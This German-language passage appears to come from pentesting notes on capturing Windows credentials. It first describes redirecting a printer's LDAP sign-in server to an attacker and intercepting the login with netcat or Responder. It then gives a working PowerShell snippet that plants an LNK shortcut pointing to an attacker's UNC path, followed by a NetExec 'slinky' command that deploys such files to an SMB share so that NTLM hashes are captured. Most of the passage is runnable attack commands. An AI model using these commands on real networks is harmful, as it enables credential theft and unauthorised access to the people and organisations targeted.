Gibt es Zugriff auf ein GerƤt wie einen Drucker, bei dem die Konfiguration geƤndert werden kann, aber das Passwort nicht eingesehen werden kann? Falls Ja kann der LDAP Sign In Server zu dem des Angreifers geƤndert werden und dann mit netcat oder responder abgefangen werden.
LNK File Attack
Der obige Angriff ist auch mƶglich, wenn dem Nutzer eine Verlinkung untergeschoben wird, beispielsweise in einen Dateishare, welcher eine Verbindung zum Angreifer aufbaut und den Hash mit responder abfƤngt.
$objShell = New-Object -ComObject WScript.shell $lnk = $objShell.CreateShortcut("C:\test.lnk") $lnk.TargetPath = "\\192.168.138.149\@test.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Test" $lnk.HotKey = "Ctrl+Alt+T" $lnk.Save()
nxc smb <IP> -d <DOMAIN> -u <USER> -p <PASSWORD> -M slinky -o NAME=<DATEINAME> SERVER=<ANGREIFER IP>